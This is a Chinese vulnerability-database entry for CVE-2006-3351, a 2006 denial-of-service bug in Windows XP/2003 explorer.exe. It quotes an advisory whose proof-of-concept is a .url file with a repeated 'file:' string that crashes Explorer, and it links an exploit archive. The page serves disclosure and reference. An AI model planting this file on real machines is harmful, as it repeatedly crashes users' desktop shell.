Microsoft Windows explorer.exe URL文件格式溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194285 漏洞类型 缓冲区溢出
发布时间 2006-07-05 更新时间 2006-08-28
CVE编号 CVE-2006-3351 CNNVD-ID CNNVD-200607-022
漏洞平台 N/A CVSS评分 5.4
|漏洞来源
https://cxsecurity.com/issue/WLB-2006070037
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200607-022
|漏洞详情
MicrosoftWindows是美国微软(Microsoft)公司发布的一系列操作系统。Windows的Shell程序explorer.exe在处理包含畸形数据的".url"文件时存在问题,本地攻击者可能利用此漏洞导致用户机器上的explorer.exe进程崩溃。如果explorer.exe解析了包含有特别格式URL的*.url文件的话,就会导致崩溃。即使通过资源管理器试图删除这个文件时也会触发崩溃。
|漏洞EXP
Windows Explorer URL File format overflow

Affected Vendor:

Microsoft

Affected Products:

WindowsXP ALL

Windows2003 ALL

Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.

if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...

if you will del exploit.url

open taskmgr.exe

open cmd.exe

then cd your desktop

del exploit.url

Exploit:

[InternetShortcut]

url=file:file:file:file:file:file:file:file:file:file:file:file:file:fil
e:file:file:file:file:file:file:file:file:file:file:file:file:file:file:

Attachment:

http://hitcon.org/Nanika-desktop_explore_0day.rar

you can drop in desktop :P

http://hitcon.org

http://www.chroot.org
|参考资料

来源:BID
名称:18838
链接:http://www.securityfocus.com/bid/18838
来源:BUGTRAQ
名称:20060706Re:WindowsExplorerURLFileformatoverflow
链接:http://www.securityfocus.com/archive/1/archive/1/439660/100/200/threaded
来源:BUGTRAQ
名称:20060705WindowsExplorerURLFileformatoverflow
链接:http://www.securityfocus.com/archive/1/archive/1/439153/100/0/threaded
来源:XF
名称:win-explorer-url-dos(27567)
链接:http://xforce.iss.net/xforce/xfdb/27567
来源:SREASON
名称:1186
链接:http://securityreason.com/securityalert/1186